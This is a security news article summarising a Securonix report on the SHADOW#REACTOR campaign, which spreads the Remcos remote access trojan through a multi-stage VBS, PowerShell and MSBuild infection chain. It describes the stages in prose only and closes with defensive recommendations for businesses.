We Detected New Malware That Allows Remote Control of Windows PCs

A new malware campaign, identified as **SHADOW#REACTOR**, installs a **remote access trojan** (RAT) called **Remcos**, allowing **cybercriminals** to control infected devices. The attack uses social engineering techniques, including fraudulent emails and messages, to deceive victims.

The report's author, the security company **Securonix**, reveals that the intrusion begins when the victim clicks on a malicious link. This triggers an obfuscated **Visual Basic** script named "win64.vbs", which is executed via the legitimate **wscript.exe** program of Windows. This first step prepares the system for future stages of the attack.

After the VBS script runs, a **PowerShell** code encoded in **Base64** is loaded. This encoding technique aims to hinder analysis of the malicious code.

The PowerShell script establishes communication with a remote server controlled by the attackers, using the **System.Net.WebClient** library. Then, text files that appear harmless and are named "qpwoe64.txt" or "qpwoe32.txt" are downloaded and saved in the Windows temporary directory. The naming of the file depends on whether the operating system is 64-bit or 32-bit.

Advanced Techniques Hinder Detection

This attack stands out due to a rigorous **verification** and autocorrection mechanism. After downloading the text files, the script enters a **loop** that checks for the presence of the file and if it meets the minimum expected size.

If the file is missing or incomplete, the malware pauses execution and attempts to download it again. Even with the timeout exceeded, the process continues, avoiding failures in the initial infection, which demonstrates sophisticated planning.

When the criteria are met, the process advances with the creation of a second PowerShell script named "jdywa.ps1", also in the temporary directory.

This script invokes a **loader** protected by the **.NET Reactor** tool, a commercial solution that obfuscates code to complicate its analysis.

When Legitimate Tools Become Weapons

The loader performs critical functions, such as establishing persistence in the system and retrieving the next phase of the malware, as well as implementing checks to avoid detection by security tools.

In the final stage of the attack, cybercriminals employ a technique called **"living-off-the-land"**. This means they leverage legitimate tools from the operating system to carry out malicious activities.

In this case, **MSBuild.exe** - a tool from **Microsoft** used to compile applications - is used to initiate the Remcos RAT on the victim's computer. Furthermore, additional scripts are scheduled to reactivate the VBS script, ensuring that the malware remains operational even if some components are disabled. Researchers estimate that this campaign is extensive, primarily targeting **business environments** and **small to medium-sized enterprises**.

The technique employed is concerning, as it aligns with the operations of **initial access brokers**, who compromise systems and subsequently sell access to other cybercriminal groups, enabling them to carry out more complex attacks, such as **ransomware** or **data theft**.

The innovative aspect of this campaign is the use of **intermediate stages** based on plain text, along with the dynamic reconstruction of malicious code in computer memory using PowerShell and a protected loader.

This framework has been meticulously planned to hinder detection by antivirus software and analysis by security experts. The modular and well-maintained design suggests it is a professional operation with significant resources.

How to Protect Yourself

Securonix recommends several measures to avoid being affected by such attacks:

• Increase user awareness about threats involving scripts;
• Educate employees about the risks of executing downloaded scripts and warn them about unexpected files;
• Restrict or monitor the execution of VBS, JS, and PowerShell scripts, especially those from user-writable directories;
• Ensure that **Endpoint Detection and Response** (EDR) solutions can detect suspicious behaviors from script interpreters;
• Enable enhanced PowerShell logging to identify suspicious activities;
• Check the improper use of trusted binaries, especially when executed in unusual contexts;
• Monitor for suspicious shortcuts and scheduled tasks that may compromise the system.

These practices are essential to reinforce security and mitigate potential attacks.

Follow our updates for more information on security and technology using our social media and signing up for our newsletters.